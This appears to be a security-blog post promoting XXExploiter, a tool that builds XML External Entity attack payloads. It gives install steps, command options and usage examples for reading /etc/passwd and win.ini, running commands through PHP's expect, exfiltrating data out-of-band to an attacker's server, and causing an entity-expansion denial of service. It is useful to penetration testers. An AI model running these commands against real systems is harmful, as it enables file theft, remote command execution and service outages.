XXExploiter- To Generates XXE Payloads


It generates the XML payloads, and automatically starts a server to serve the needed DTD’s or to do data exfiltration.

What is XML External Entity (XXE)?

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.


#install node and npm if you don’t have it yet

npm install -g xxexploiter

Building & Running from source

This is a simple Node application written with typescript.

So you can build it as you build other apps:
(install node and npm first, if you dont have them)

npm install 
npm run build

#you may need to npm install typescript -g in order for ‘npm build’ to succeed

To run the app you can do it with one of 3 ways:

npm start [args] 
node dist/index.js [args] 
npm link #and now just call xxexploiter


Or you can install it on your system:

npm link


Usage: xxexploiter [command] [options]


  • xxexploiter file [file_to_read] Use XXE to do a request
  • xxexploiter request [URL] Use XXE to do a request
  • xxexploiter expect [command] Use XXE to execute a command through PHP’s expect
  • xxexploiter xee [expantions] Generate a huge content by resolving entities

Fuzzing Specific Options

-w, –wordlist Path to a wordlist to be used with the fuzz command. Use {{FUZZ}} placeholder in the command arg
for the magic.
-y, –success-string String to search for a success response in the requests. Not usefull for blind attacks
-n, –error-string String to search for an error response in the request. Not usefull for blind attacks


–version Show version number [boolean] -s, –server Server address for OOB and DTD
-p, –port Server port for OOB and DTDs. Default: 7777
-t, –template path to an XML template where to inject payload
-m, –mode Extraction Mode: xml, oob, cdata. Default: xml
-e, –encode Extraction Encoding: none, phpbase64. Default: none
-o, –output Output for the XML payload file. Default is to console
-x Use a request to automatically send the xml file
-X, –request-output Output the response from -x option. If not defined goes to stdout
–verbose Enable some messages help for understanding whats happening
–doctype Specify the name of the doctype to be injected. Default is xxexploiter
-h, –help Show help [boolean]


  • xxexploiter expect ls
  • xxexploiter -s expect ls -e phpbase64 -m oob -o output.xml
  • xxexploiter -s file /c/windows/win.ini -t xmltemplate.xml -m oob
  • xxexploiter xee 900000000 -o output.xml
  • xxexploiter file /etc/passwd -x request.txt -t template.xml
  • xxexploiter file /root/{FUZZ} -w wordlist.txt -n “not found” -x request.txt

Extra Info:
– When using the xml or cdata modes, add the placeholder ‘{{XXE}}’ in the field where you want the entity content to
be injected.
– When specifiying file paths for windows use forward slash.
– OOB: Out Of Bound: You can use this option to send the data processed by the xml parser, to your local webserver.
Usefull with blind attacks.
– When using XML mode, it may break the XML parsing if XML reserved characters are loaded, so you may want to use
– When using the request option, you can specify the placeholder to inject the payload with {{XXE}} or {{XXE_B64}}
– When fuzzing you can add the {{FUZZ}} keyword in the main command argument.
– You can specify a string to filter successfull requests when fuzzing, either by supplying an expected error string,
or an expected success string.

Download XXExlpoiter

Also See: XML External Entity (XXE) Injection Payload Cheatsheet

For the latest update about Cyber and Infosec World, follow us on Twitter, Facebook, Telegram , Instagram and subscribe to our YouTube Channel.

Subscribe to HackersOnlineClub via Email

Enter your Email address to receive notifications of Latest Posts by Email | Join over Million Followers

More from Priyanshu Sahay

Do VPNs Mitigate or Enhance Security Risks?

At the moment every one of us is at the risk of...
Read More